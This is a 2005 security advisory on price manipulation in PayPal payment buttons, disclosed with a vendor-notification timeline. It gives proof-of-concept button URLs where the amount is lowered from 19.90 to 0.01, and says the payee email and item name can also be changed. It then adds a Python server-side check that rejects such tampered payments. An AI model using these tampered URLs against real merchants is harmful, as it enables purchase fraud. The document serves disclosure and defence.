paypalFlaw.txt

2005-08-14T00:00:00
ID PACKETSTORM:39358
Type packetstorm
Reporter Lostmon
Modified 2005-08-14T00:00:00

Description

                                        
##############################################
PayPal 'buttons' price manipulation.
vendor url: https://www.paypal.com/
http://lostmon.blogspot.com/2005/05/paypal-arbitrary-price-manipulation.html
vendor notify: yes    exploit available: yes
Discovered by FalconDeOro(1) and Lostmon(2)
##############################################  
  
PayPal buttons are prone to price manipulation.
All stores based on PayPal buttons are possibly
vulnerable to this flaw.
  
  
##########################  
Code example of a button
##########################
The proof is based on this form:
  
https://www.paypal.com/us/cgi-bin/webscr?cmd=p/xcl/rec/options-help-outside  
  
In the example of exploitation we used the "PayPal price manipulation kit"
program to shop.
This is a non-existent product...
  
The link of the button for shopping has this URL:
(1)  
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick  
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+  
kit&item_number=1&amount=19.90&no_shipping=1&return  
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15  
  
  
This is the normal price for the product (19.90$), but...
if we change the 'amount' variable to 0.01, the product now costs 0.01$:
  
https://www.paypal.com/cgi-bin/webscr?cmd=_xclick  
&business=[EMAIL-Bussines]&item_name=PayPal+price+manipulation+  
kit&item_number=1&amount=0.01&no_shipping=1&return  
=[SITE SUBMIT]&cancel_return=[SITE RETURN]&submit.x=70&submit.y=15  
  
Another way of exploiting this situation:
  
(2)  
This other example comes from a store based on PayPal:
  
https://www.paypal.com/cart/add=1&business=[EMAIL-Bussines]
&item_name=PayPal+price+manipulation+kit&item_number=
7&return=[SITE SUBMIT]&cancel_return=[SITE RETURN]&amount=[PRICE]&shipping=0
&shipping2=0&handling=0&rm=2&custom=1&currency_code=USD
  
If we look closely, we can change not only the price but also the email account,
the name of the product, and other details.
To shop you need an account on PayPal.
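The root cause is that every field in the button URL (amount, business, item_name, currency_code) is supplied by the client. The defence is for the merchant to compare what was actually paid against its own server-side record of the product before fulfilling the order. The following is an added example of such a check, not code from the advisory or from PayPal; the catalog, merchant address and sample URLs are constructed here, and a real deployment would run the same comparison over the payment notification PayPal sends rather than over the button URL.

```python
from decimal import Decimal
from urllib.parse import urlsplit, parse_qs

# Server-side truth (constructed): what the merchant knows each item costs.
# Item 1 mirrors the advisory's example (1).
CATALOG = {
    "1": {"name": "PayPal price manipulation kit",
          "amount": Decimal("19.90"), "currency": "USD"},
}
MERCHANT_EMAIL = "merchant@example.com"  # placeholder for [EMAIL-Bussines]

# Constructed sample links: the legitimate button and the same link with
# `amount` lowered to 0.01, exactly the manipulation the advisory describes.
LEGIT_URL = ("https://www.paypal.com/cgi-bin/webscr?cmd=_xclick"
             "&business=merchant@example.com"
             "&item_name=PayPal+price+manipulation+kit&item_number=1"
             "&amount=19.90&no_shipping=1&currency_code=USD")
TAMPERED_URL = LEGIT_URL.replace("amount=19.90", "amount=0.01")


def parse_button_url(url):
    """Flatten the query string of a PayPal button URL into a dict."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}


def verify_payment(fields, catalog=CATALOG, merchant_email=MERCHANT_EMAIL):
    """Accept a payment only if the client-supplied fields match the
    merchant's own records. Returns (ok, reason). Nothing in `fields`
    is trusted on its own: item, payee, currency and amount are all
    re-derived from the server side."""
    item = catalog.get(fields.get("item_number"))
    if item is None:
        return False, "unknown item_number"
    if fields.get("business") != merchant_email:
        return False, "payment not addressed to our merchant account"
    if fields.get("item_name") != item["name"]:
        return False, "item_name does not match catalog"
    # PayPal treats a missing currency_code as USD; assumed here as well.
    if fields.get("currency_code", "USD") != item["currency"]:
        return False, "currency mismatch"
    try:
        paid = Decimal(fields.get("amount", ""))
    except Exception:
        return False, "unparseable amount"
    if paid != item["amount"]:
        return False, f"amount {paid} does not match price {item['amount']}"
    return True, "ok"
```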
  
#############  
timeline:  
#############  
  
Discovered: 14 May 2005
Vendor notify: 25 May 2005
Vendor response: 26 May 2005
Disclosure: 27 May 2005
  
  
################### End ####################  
  
Thanks to Estrella for being my light
Thanks to Icaro, he is my support
Thanks to FalconDeOro ... patience.
Thanks to all the http://www.osvdb.org Team
Thanks to all who day after day support me!!!
  
Contact FalconDeOro:
(falcondeoro@gmail.com)  
http://falcondeoro.blogspot.com  
  
--   
Sincerely:
Lostmon (lostmon@gmail.com)  
Web-Blog: http://lostmon.blogspot.com/  
Data Mangler of: http://www.osvdb.org  
--  
Curiosity is what moves the mind